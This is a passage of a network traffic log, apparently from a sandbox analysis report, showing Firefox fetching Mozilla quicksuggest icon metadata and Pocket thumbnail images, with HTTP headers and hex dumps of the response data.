e92473eacece79be3815bb67f4d186988ae26f3c6e030015e755","size":2465,"filename":"icon-161351842074521","location":"main-workspace/quicksuggest/f11c1bba-0d2e-44d8-acb1-e375719dd8b8","mimetype":"application/octet-stream"},"content_type":"image/png","id":"icon-
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 37 31 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 38 34 32 31 36 36 36 39 33 7d 2c 7b 22 74 79 70 65 22 3a 22 69 63 6f 6e 22 2c 22 73 63 68 65 6d 61 22 3a 31 37 32 31 38 34 30 37 35 32 33 31 31 2c 22 61 74 74 61 63 68 6d 65 6e 74 22 3a 7b 22 68 61 73 68 22 3a 22 63 39 38 62 36 35 36 33 63 39 30 37 31 63 30 65 66 65 32 33 36 32 62 36 38 35 65 31 30 36 36 38 39 39 30 39 37 62 30 34 64 38 31 34 36 64 65 37 62 64 61 61 36 66 35 31 62 30 30 30 66 66 30 32 22 2c 22 73 69 7a 65 22 3a 33 35 31 32 2c 22 66 69 6c 65 6e 61 6d 65 22 3a 22 69 63 6f 6e 2d 37 31 35 32 31 32 32 38 30 38 37 31 34 39 37 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 6d 61 69 6e 2d 77 6f 72 6b 73 70 61 63 65 2f 71 75 69 63 6b 73 75 67 67 65 73 74 2f 30 35 39 36 35 36 35 36 Data Ascii: 71","last_modified":1721842166693},{"type":"icon","schema":1721840752311,"attachment":{"hash":"c98b6563c9071c0efe2362b685e1066899097b04d8146de7bdaa6f51b000ff02","size":3512,"filename":"icon-715212280871497","location":"main-workspace/quicksuggest/05965656
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 34 34 2d 61 39 33 61 2d 61 32 30 38 66 33 64 36 66 64 31 63 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 7d 2c 22 63 6f 6e 74 65 6e 74 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 2f 70 6e 67 22 2c 22 69 64 22 3a 22 69 63 6f 6e 2d 37 31 35 32 31 32 32 38 30 38 37 31 34 35 33 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 38 34 32 31 36 36 36 38 31 7d 2c 7b 22 74 79 70 65 22 3a 22 69 63 6f 6e 22 2c 22 73 63 68 65 6d 61 22 3a 31 37 32 31 38 34 30 37 35 33 34 33 38 2c 22 61 74 74 61 63 68 6d 65 6e 74 22 3a 7b 22 68 61 73 68 22 3a 22 36 36 63 63 37 66 37 38 39 66 62 66 33 62 63 37 63 37 61 36 65 63 38 39 38 61 62 32 62 64 33 39 33 33 33 36 34 35 65 66 61 61 62 32 36 30 36 34 Data Ascii: 44-a93a-a208f3d6fd1c","mimetype":"application/octet-stream"},"content_type":"image/png","id":"icon-715212280871453","last_modified":1721842166681},{"type":"icon","schema":1721840753438,"attachment":{"hash":"66cc7f789fbf3bc7c7a6ec898ab2bd39333645efaab26064
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 36 66 66 36 35 64 22 2c 22 73 69 7a 65 22 3a 32 35 37 33 2c 22 66 69 6c 65 6e 61 6d 65 22 3a 22 69 63 6f 6e 2d 37 31 35 32 31 32 32 38 30 38 37 31 34 37 33 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 6d 61 69 6e 2d 77 6f 72 6b 73 70 61 63 65 2f 71 75 69 63 6b 73 75 67 67 65 73 74 2f 32 61 63 33 33 37 39 62 2d 33 31 39 30 2d 34 30 62 39 2d 62 39 61 32 2d 61 38 32 34 66 63 65 61 38 63 35 33 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 7d 2c 22 63 6f 6e 74 65 6e 74 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 2f 70 6e 67 22 2c 22 69 64 22 3a 22 69 63 6f 6e 2d 37 31 35 32 31 32 32 38 30 38 37 31 34 37 33 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 38 34 32 31 36 36 36 37 32 Data Ascii: 6ff65d","size":2573,"filename":"icon-715212280871473","location":"main-workspace/quicksuggest/2ac3379b-3190-40b9-b9a2-a824fcea8c53","mimetype":"application/octet-stream"},"content_type":"image/png","id":"icon-715212280871473","last_modified":1721842166672
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 69 63 6f 6e 22 2c 22 73 63 68 65 6d 61 22 3a 31 37 32 31 38 34 30 37 35 38 34 31 36 2c 22 61 74 74 61 63 68 6d 65 6e 74 22 3a 7b 22 68 61 73 68 22 3a 22 37 32 30 64 32 61 39 35 65 63 38 31 39 62 31 39 64 61 35 64 37 62 61 62 30 39 33 62 39 33 63 37 31 37 35 33 37 30 37 35 66 32 36 36 30 36 31 31 31 64 38 39 33 37 30 30 62 66 63 36 39 62 39 62 22 2c 22 73 69 7a 65 22 3a 36 34 32 35 2c 22 66 69 6c 65 6e 61 6d 65 22 3a 22 69 63 6f 6e 2d 37 32 35 32 31 32 32 38 30 38 37 34 34 32 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 6d 61 69 6e 2d 77 6f 72 6b 73 70 61 63 65 2f 71 75 69 63 6b 73 75 67 67 65 73 74 2f 64 64 62 30 31 33 32 37 2d 37 31 64 33 2d 34 32 37 62 2d 38 66 32 35 2d 32 36 36 36 63 61 31 30 31 39 62 66 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 Data Ascii: icon","schema":1721840758416,"attachment":{"hash":"720d2a95ec819b19da5d7bab093b93c717537075f26606111d893700bfc69b9b","size":6425,"filename":"icon-72521228087442","location":"main-workspace/quicksuggest/ddb01327-71d3-427b-8f25-2666ca1019bf","mimetype":"app
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 73 74 72 65 61 6d 22 7d 2c 22 63 6f 6e 74 65 6e 74 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 2f 70 6e 67 22 2c 22 69 64 22 3a 22 69 63 6f 6e 2d 37 32 35 32 31 32 32 38 30 38 37 35 34 32 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 38 34 32 31 36 36 36 35 35 7d 2c 7b 22 74 79 70 65 22 3a 22 69 63 6f 6e 22 2c 22 73 63 68 65 6d 61 22 3a 31 37 32 31 38 34 30 37 35 39 35 30 32 2c 22 61 74 74 61 63 68 6d 65 6e 74 22 3a 7b 22 68 61 73 68 22 3a 22 35 31 36 65 64 64 31 36 37 61 33 32 37 61 66 36 31 65 31 39 34 64 30 66 37 30 35 37 61 32 61 64 31 65 35 62 66 38 64 66 30 36 37 39 33 38 38 35 38 31 33 66 39 32 62 36 61 38 33 33 61 35 63 30 22 2c 22 73 69 7a 65 22 3a 39 34 39 31 2c 22 66 69 6c 65 6e 61 6d 65 22 3a 22 69 63 6f 6e 2d 37 32 35 32 31 32 Data Ascii: stream"},"content_type":"image/png","id":"icon-72521228087542","last_modified":1721842166655},{"type":"icon","schema":1721840759502,"attachment":{"hash":"516edd167a327af61e194d0f7057a2ad1e5bf8df06793885813f92b6a833a5c0","size":9491,"filename":"icon-725212

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	64210	34.120.237.76	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	591	OUT	GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fimgix.bustle.com%2Fuploads%2Fimage%2F2024%2F7%2F24%2Fd57cdb8b%2Fquitcooking_social.jpg%3Fw%3D1200%26h%3D630%26fit%3Dcrop%26crop%3Dfaces%26fm%3Djpg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site
2024-07-26 18:11:01 UTC	1124	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 5337 x-amzn-RequestId: 90d6f502-c082-488d-b29f-74dd2928c669 X-XSS-Protection: 1; mode=block Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=63072000; includeSubdomains; preload X-Frame-Options: DENY Content-Security-Policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: bgildFEAoAMEEwQ= X-Content-Type-Options: nosniff X-Amzn-Trace-Id: Root=1-66a34aef-635c92e220ef72cf45bcbfbf;Parent=1431963bc3cd619e;Sampled=0;lineage=69363f46:0 x-amzn-Remapped-Date: Fri, 26 Jul 2024 07:06:23 GMT X-Amz-Cf-Pop: HIO50-C1 X-Amz-Cf-Pop: SEA900-P2 X-Cache: Hit from cloudfront X-Amz-Cf-Id: fUS0syvlCHUSJCkHcvrPtvgP4v5PI_Ximqd24E7VLfRRZ4pRLnmpzQ== Via: 1.1 95b0ac620fa3a80ee590ecf1cda1c698.cloudfront.net (CloudFront), 1.1 97bc018596ec6eea95bb5c59cf872884.cloudfront.net (CloudFront), 1.1 google Date: Fri, 26 Jul 2024 07:08:12 GMT Age: 39769 ETag: "5487d5efb9bf4bef1c5137fc3b19abfd104d9d1f" Content-Type: image/jpeg Cache-Control: max-age=3600,public,public Alt-Svc: clear Connection: close
2024-07-26 18:11:01 UTC	266	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 01 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff c2 00 11 08 00 94 01 28 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 06 03 07 02 01 ff da 00 08 01 01 00 00 00 00 db 00 00 0c 34 6f 42 00 00 00 09 39 39 d7 34 f8 ad 2e d2 17 c0 00 00 01 a0 91 e7 d9 5a 8e 3b 0d ee ab 23 8a b2 ba 00 00 01 f7 a7 Data Ascii: JFIF++&.%#%.&D5//5DNB>BN_UU_wqw++&.%#%.&D5//5DNB>BN_UU_wqw("4oB994.Z;#
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: c9 be 96 00 00 03 35 06 bf ea 5c b5 3c 7b 7f 39 db 5c ea c0 00 00 f9 c1 c7 97 0a 52 3d cf 18 3e 49 ed 7d b5 60 00 00 e5 9d c3 d9 4a b3 89 79 f7 3b e2 25 24 9f b9 97 e0 00 01 9d c2 7b d5 26 5e 54 be 93 3b fd f1 c3 c7 99 df 57 f8 00 00 20 68 34 9e 49 12 ca b9 d5 69 71 1b 13 c7 ef d0 40 00 08 fc e5 58 56 e7 38 56 72 bb ac 9b 03 77 86 ce f9 f7 b1 68 6f 80 00 29 bc c2 8e 3c db 7f 49 c8 7a 0f 4b 1b 38 95 f6 35 3e 79 e6 ba ad e6 b0 00 02 bb 39 a5 eb 13 15 eb 55 ef 9e b2 ab 7e 7e 3e 65 60 32 9e d5 f4 00 00 0c e7 79 0f b8 df 1f 75 dd 7f 24 72 b0 b4 00 00 07 ef 9b 6c 6d 66 f5 8b 12 ca 8a 2c d8 79 d9 9a f0 00 00 32 dd e9 d1 24 53 e9 37 38 6c b5 9e b5 74 00 00 06 6f 11 c7 65 55 69 97 e3 e9 d5 79 d8 bb f9 5d c0 00 00 c9 e5 ee 2f b4 3f 9f 7d 1f 91 28 e5 4c 92 00 00 05 Data Ascii: 5\<{9\R=>I}`Jy;%${&^T;W h4Iiq@XV8Vrwho)<IzK85>y9U~~>e`2yu$rlmf,y2$S78ltoeUiy]/?}(L
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: ee cb ea 10 c2 5f 94 5a 01 05 54 47 78 38 b7 e5 35 b5 45 b6 a6 ab a6 3c a4 fe b1 d6 a5 8a 32 a5 8d e3 15 9e 60 0d ab c8 ba da ff 00 82 f7 33 cf b5 ad 52 92 22 7e 17 5b fe 51 a0 16 d3 1e 21 13 05 10 43 3d e3 d9 3a ed 3a e5 e2 eb 4a 5c 86 85 03 9e c1 71 05 22 40 5f a9 41 75 96 f8 ab 65 90 73 e2 bd 0d 06 3d ac 23 9f 11 dc 95 d8 c6 4b 23 f9 ac 3f 15 42 40 46 49 92 c7 80 84 fd be 36 5d 04 94 12 e0 a2 13 5a 6e a5 3e 90 c1 30 8e 24 8d 4c 89 19 43 8e 69 c9 2a 66 0a 6c ca dd 04 25 f7 a9 e9 34 83 a0 c4 42 d6 6a d7 0f 33 61 32 77 29 2e a9 52 50 4f f8 4e 4b 12 20 45 f4 ea cc d7 da e3 15 f4 64 7b d9 e3 56 fe 2f 16 99 cc f7 2f 63 bb 7e 69 67 c9 89 10 15 89 63 bf 2b 9a c6 39 b5 9e 7d fb 54 ef 31 5a f2 fe e1 53 47 a4 6b ee d5 fa 2e ed b1 8c 7d 5d db 7a b5 81 a4 eb 0b d7 Data Ascii: _ZTGx85E<2`3R"~[Q!C=::J\q"@_Aues=#K#?B@FI6]Zn>0$LCi*fl%4Bj3a2w).RPONK Ed{V//c~igc+9}T1ZSGk.}]z
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 1a e7 e3 0e 70 4e 4b 53 27 2c 85 22 3b b5 f7 63 81 51 7a 2f 1e 9c e8 98 01 46 71 e7 4b e9 02 09 3e 66 a2 b1 d1 2d f9 d4 35 04 d6 8e 32 49 39 eb 56 1d 95 97 9f 55 f1 20 a9 31 4b ac 57 d1 41 8c 9a 60 51 99 5b 7e 18 88 23 84 c8 05 6b d4 22 41 6f 73 69 4f 7b b7 e4 66 74 a4 39 41 9a b4 ea 40 07 3d 7d 6a 38 88 ce a3 85 14 e7 44 3e 60 7b 7e af 12 68 a3 02 b3 31 88 f1 eb e2 6e 5e 64 54 66 84 18 40 62 4e 1c cd 76 28 4d b5 9e d0 1f fb 5f 52 9d 45 26 f1 8d 25 86 7c 79 e7 53 30 fc 32 39 7e 14 fa 13 98 eb 5d 8e 23 39 9d 6b d5 9d 69 8e 8b 9f e1 5a 02 16 69 72 c5 6d 44 1f aa 59 ff 00 6a 05 94 e3 7c bf a4 2d 5f b6 b7 3b 3c 20 5b 03 bc 43 05 cc 8f 33 50 98 64 01 19 9c 94 2e 83 c4 4c 00 a2 5d 8f 04 5e b5 6d d6 f0 55 cc 2e 58 0f 9e 1c b3 a4 c4 b6 6d f4 6d 71 f3 c5 ca 8e 47 Data Ascii: pNKS',";cQz/FqK>f-52I9VU 1KWA`Q[~#k"AosiO{ft9A@=}j8D>`{~h1n^dTf@bNv(M_RE&%\|yS029~]#9kiZirmDYj\|-_;< [C3Pd.L]^mU.XmmqG
2024-07-26 18:11:01 UTC	901	IN	Data Raw: f6 eb b8 42 c1 46 cb 16 75 e8 9d b9 5f 00 cc f6 75 72 c9 7b 88 54 8c 18 62 71 1a 5f 46 25 6d 3e 85 7f ea b6 b5 7d d4 cf 4b 01 6a 17 10 1a 4d 63 6f cf c4 35 bb 4a 3e d3 85 ad 9f 6a da 2f 5d 67 5e f8 6b 2b 80 bd 5e da b6 5b fb 3b a8 ee f6 6a 66 02 d5 eb 2d 64 dd b9 91 54 61 06 3b d9 d2 00 a1 1c cf be 75 9e b5 74 cd d2 db f8 bc cb 70 e9 58 e7 0a 08 13 f6 68 9d 14 01 26 9c 6f 3a 5b 01 cf be b7 87 6a 14 63 23 94 d1 b3 80 dc c4 7b 91 a4 69 57 43 80 ce 31 c6 23 88 f7 69 0e 12 57 43 84 eb 41 fc 41 7b 52 a7 43 87 78 7e 22 9d 17 11 1a b6 1d 31 54 7c aa 55 b0 83 de e9 53 c7 4a 25 49 6e 20 2f cb 15 3c 68 3b 54 af e5 e2 31 af e5 50 b5 1f 2c d6 39 ac 61 67 a0 f9 62 b1 35 4b 56 ef ef ff 00 27 ff c4 00 29 11 00 02 02 02 00 05 03 03 05 00 00 00 00 00 00 00 02 03 00 12 04 Data Ascii: BFu_ur{Tbq_F%m>}KjMco5J>j/]g^k+^[;jf-dTa;utpXh&o:[jc#{iWC1#iWCAA{RCx~"1T\|USJ%In /<h;T1P,9agb5KV')

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	64205	34.120.237.76	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	509	OUT	GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2Ff85f50edcf894021a38860edd7f5438c.jpg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site
2024-07-26 18:11:01 UTC	1100	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 9516 x-amzn-RequestId: fd83a5b0-517e-45e7-96c4-7f877a84f49f X-XSS-Protection: 1; mode=block Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=63072000; includeSubdomains; preload X-Frame-Options: DENY Content-Security-Policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: a0c8NFsxIAMELxw= X-Content-Type-Options: nosniff X-Amzn-Trace-Id: Root=1-6691a84d-653b80ad4ff9697516d14888;Parent=44882283977c2753;Sampled=0;lineage=69363f46:0 x-amzn-Remapped-Date: Fri, 12 Jul 2024 22:03:57 GMT X-Amz-Cf-Pop: SEA900-P2 X-Cache: Hit from cloudfront X-Amz-Cf-Id: mlWHGw9ZG9Gyh82_kWODH8QuZqkgbCeTnmIqF1QC0K_5RqnfKsRj7A== Via: 1.1 4f87745990545c1ac0195c157e1668f8.cloudfront.net (CloudFront), 1.1 64e31a85c2af2cc10d070383c1f71288.cloudfront.net (CloudFront), 1.1 google Date: Fri, 26 Jul 2024 09:28:02 GMT Age: 31379 ETag: "a84a0df93a67c84766d5a6e9cc4d7aeca640a3c3" Content-Type: image/jpeg Cache-Control: max-age=3600,public,public Alt-Svc: clear Connection: close
2024-07-26 18:11:01 UTC	290	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 01 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff c2 00 11 08 00 94 01 28 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 02 03 06 00 01 07 ff da 00 08 01 01 00 00 00 00 68 74 e1 e5 15 30 5e d5 b8 b0 03 c6 b5 0b 88 17 58 f4 ce 5e 2e bc e4 fe 36 bf 37 aa 5b 5e 61 19 6c 7a b1 27 68 a4 58 4d 8a e6 c5 Data Ascii: JFIF++&.%#%.&D5//5DNB>BN_UU_wqw++&.%#%.&D5//5DNB>BN_UU_wqw("ht0^X^.67[^alz'hXM
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 9b bf 7e 53 f6 da 34 49 c7 e6 08 2b 6c 9c 3b 05 14 c3 b8 d3 31 6d 82 63 64 08 62 8e 85 9f 31 23 5d b0 97 ce f7 3a 22 50 b6 3e 80 86 e1 e2 16 87 31 e1 d7 46 59 f6 ca b8 82 ae 82 88 29 c2 3c ab 6e a9 6e a7 50 2b 13 49 05 39 32 88 21 30 10 32 99 32 35 70 37 77 43 95 a1 9a 5c 5b df a1 8f b0 c2 c3 68 75 5c d0 8c 5b 73 ac 57 e0 6b ed a9 83 42 33 0e 29 8a 83 c5 11 41 09 33 15 ed e5 ae c3 99 b9 71 39 de 6e 54 86 55 2a 16 17 2a 2a 2c b8 2a 68 bc 3b 56 7a 21 19 d4 f3 ed d5 f8 b6 7b e6 f1 f1 9d b8 e7 2e 02 82 eb 53 8a 47 15 68 be 4c 21 c8 a1 6a eb 32 b7 b5 46 f3 29 a8 ea de 6d 21 ec ad d1 05 75 6a ed cf 31 a2 d1 e8 81 f0 1a 40 41 00 fd 93 64 c2 92 16 b9 9c 1d eb 55 06 37 d0 cd e1 cd 1e a4 ab e7 57 4c 46 01 52 2d b1 48 b8 74 e4 1e a1 95 6c a6 db 80 10 27 7f 68 92 d6 Data Ascii: ~S4I+l;1mcdb1#]:"P>1FY)<nnP+I92!0225p7wC\[hu\[sWkB3)A3q9nTU**,h;Vz!{.SGhL!j2F)m!uj1@AdU7WLFR-Htl'h
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: a7 2f 32 48 2a 53 6e 9b b0 b1 2c 01 38 a5 47 2a c7 53 0e b9 9b a2 30 eb 32 af dc 93 d4 95 b9 9f f6 07 8f cb 77 4f 99 97 3c 49 13 e0 50 1b 32 6b c7 2b b1 61 4d d4 d9 fd be 2a 22 2f 51 eb 59 78 31 c9 c7 74 a2 82 38 7d 97 79 1d 79 04 64 f9 a2 2e 49 68 c7 6f f9 4f 3a 7f 1a a1 db d0 4f aa 09 cf 57 c4 a3 e5 4e 0f 95 64 43 b5 64 1c 9c 9b 2e 51 e2 13 ce ad 39 52 42 bd 90 14 f2 53 bb 6f 67 21 ad b5 f4 9f d9 6b 91 92 bd b2 a6 dc e3 dd cc c0 b5 28 17 2d 70 72 6f e7 7e dc ce b4 9a 76 97 71 a4 62 f5 a4 d5 80 d0 8b b9 79 81 ce ae e3 fa a3 02 31 6f 0e 07 04 8d 2c ad 72 5a ad d2 69 22 5f c3 3e 4e 92 1f 1e 93 34 5e 06 4f 8d e2 f1 66 1d 70 f2 46 4e 16 18 af a7 5d bb b7 a7 20 6b ca f1 b3 af 00 69 af 6a 43 ba 4b 81 04 45 33 f4 55 cf 49 54 76 24 c9 2c 21 17 a2 f0 8b 8c c7 c6 Data Ascii: /2HSn,8GS02wO<IP2k+aM*"/QYx1t8}yyd.IhoO:OWNdCd.Q9RBSog!k(-pro~vqby1o,rZi"_>N4^OfpFN] kijCKE3UITv$,!
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 0b 6d 72 f3 34 06 28 69 35 53 35 a0 d2 cc 29 7a 52 bd 53 20 c1 19 08 51 aa d5 de 83 96 2b ae d9 4d ff 00 1a 47 aa 3e 0b e3 56 65 b2 6f 5d 09 a1 c7 3d 69 cb c4 a7 00 20 00 e4 63 8f a7 27 b3 4f 81 f1 95 8f bc 8a e3 a4 cf 90 f2 36 ba 75 dc 37 1f 22 eb 12 4f 88 ce 57 d8 ce 38 ee 05 a4 74 a7 a1 75 9f 5e 1e b4 0d d7 aa 80 60 66 c1 e3 c6 9b 17 b5 a2 0f 05 72 e4 90 7e 9e 70 cd f2 5e 7b 92 14 ea 09 a0 2b cb 37 3a ce b7 59 53 8f ed b5 11 ce 0f bd 4c 73 67 28 41 19 58 7e 3c 9b 2a 7e a1 5a 43 1f 94 a9 07 70 f3 e6 65 0e f4 2c db 6c c6 1e 3d 32 38 23 58 27 aa 23 9d 57 7d df b1 ea 20 99 23 a6 dd f9 16 f2 68 0b 0c 3a 1c 3f cb 31 58 f3 93 81 49 d8 fe 4d 2f 35 c3 62 3b 2f f9 8c 45 e2 89 6a 81 81 97 1c d5 a0 93 6b 60 c6 7b 5b 32 ec ba cc 7e 14 24 c1 34 8c 10 13 42 ce 58 a4 Data Ascii: mr4(i5S5)zRS Q+MG>Veo]=i c'O6u7"OW8tu^`fr~p^{+7:YSLsg(AX~<*~ZCpe,l=28#X'#W} #h:?1XIM/5b;/Ejk`{[2~$4BX
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 80 fb 67 33 4e 39 f7 96 7f e3 22 03 f6 db 71 90 a7 67 00 eb 0b 05 06 36 65 ca f1 a6 09 39 53 a6 30 14 c6 96 55 28 28 dc ae b1 f1 ac 88 ea 8b 30 5e 3c f4 ed 4e 00 8c dd a6 14 75 15 a4 d3 c8 fe 42 43 43 e4 de 16 b4 95 b5 bc 31 19 f4 2d 35 d3 39 4a 02 7b 8d 1c be 9c 22 10 c9 5a 23 18 85 52 c6 15 1e 07 44 98 d0 69 8a 92 07 63 ba 07 6c 37 b2 b2 f5 58 fa 2f cf 3a a9 e5 c0 52 5b 55 79 09 90 18 93 c0 89 77 be b2 6f dc 80 ba e0 9e 58 9e 35 9d cf c4 a7 27 92 dc af 03 9f 78 16 eb 90 07 3c 6b 1a a7 a9 ff 00 4d 5a f6 5c ae da c4 47 c9 86 6a 7e b4 7b db 0b 0e c7 d1 03 44 6b 6f 1d ed 92 a7 de 82 77 c6 20 1f b1 b0 31 a0 ed f6 de 9d 3e 37 3c 7b 4c a8 40 4c 55 88 d6 3e 48 7d ca 94 ab 37 1b 74 fb a8 55 d0 dd b1 8e 4e e9 b4 09 92 eb 14 ea 08 9f 2b 09 27 3e 41 c7 55 79 a7 76 Data Ascii: g3N9"qg6e9S0U((0^<NuBCC1-59J{"Z#RDicl7X/:R[UywoX5'x<kMZ\Gj~{Dkow 1>7<{L@LU>H}7tUN+'>AUyv
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 92 76 e1 08 e5 88 fe a4 d3 c1 94 b9 91 84 e2 29 dc d0 4c 4a 25 a2 71 26 87 12 e8 c9 66 d2 e1 27 8b 5f d8 40 37 84 58 4f ad dc 8d 9c c3 78 b5 b9 c8 de 00 cf b5 03 8a 06 7d e8 3e 95 41 7b 00 d7 87 26 1b 0d c2 26 ec 8c 8a 02 48 e8 dd 53 32 d3 98 3e d2 05 c4 b4 1c ad 92 69 bc e5 83 d6 45 ee bc 64 1d c5 28 86 b6 a5 b3 e9 46 b3 44 9b ff 00 cb 6a 06 c0 66 13 58 d0 0e 64 26 b1 d0 ec 31 1b 0e 1c f1 29 fb 2a 23 21 f5 46 e1 b3 60 bb 96 58 b3 0a 8d 1a a1 87 16 8e c3 65 a3 49 84 cf ba 6f 29 d8 41 6b 19 8c b3 62 e4 de 6f 10 42 ce 33 ee 6a 71 6b 49 c7 38 59 ae 1e 9b 26 58 07 58 70 f0 e5 9a 77 97 d2 bb 44 46 12 5f f2 4e b7 0e e8 d8 16 30 bc ff 00 48 42 79 20 d7 f1 b8 ee ed 47 72 75 39 71 24 90 31 0b f5 aa 77 02 06 49 dc e0 73 4e c2 4b 41 98 fd ee 9f 84 b7 49 3b fb 28 07 Data Ascii: v)LJ%q&f'_@7XOx}>A{&&HS2>iEd(FDjfXd&1)*#!F`XeIo)AkboB3jqkI8Y&XXpwDF_N0HBy Gru9q$1wIsNKAI;(
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: da c8 97 13 75 81 ba e5 d2 e1 b7 42 69 e1 13 20 7b 43 54 f3 72 e4 58 d9 1b a7 18 20 e4 31 7d d4 d3 07 b9 03 66 8d 55 4a 14 0c 6f 77 35 30 e2 83 62 59 ff 00 ca 36 02 32 40 48 6b bd eb 1c 82 6f 08 0e 2f de a9 c2 05 bd c8 06 f0 0b c7 82 e4 2a f1 01 36 96 dd 13 37 d5 3c f2 63 a0 73 8a 77 94 b7 b9 bf e5 43 5c d1 b9 d7 dc 54 e2 0a 34 29 d6 2e 71 c8 21 45 d1 d0 21 4b a7 a9 c9 86 c3 93 a6 47 c1 0f fa 8d 8f d3 85 34 47 09 c6 23 d5 4d 2e 2d 7c e3 c5 d2 d0 d0 aa 1b b5 ac 23 f3 73 90 2e 69 c4 2e 7e 8b f8 97 5f a6 03 7e 48 5f a9 12 eb 9c d3 46 a2 c1 7a 36 94 4d a0 d9 be 28 dc 80 e2 27 da 40 4b 1a 2f 03 79 72 3a a1 51 d8 86 ca 7b 90 b9 20 c8 ee 4e d7 74 68 61 91 a9 69 fa ac c4 de 37 44 48 00 d9 34 b8 d1 7c 66 27 25 4e ed 0e d7 a2 50 b1 69 2a 25 a0 9b 2c b1 0d 11 a3 54 Data Ascii: uBi {CTrX 1}fUJow50bY62@Hko/67<cswC\T4).q!E!KG4G#M.-\|#s.i.~_~H_Fz6M('@K/yr:Q{ Nthai7DH4\|f'%NPi%,T
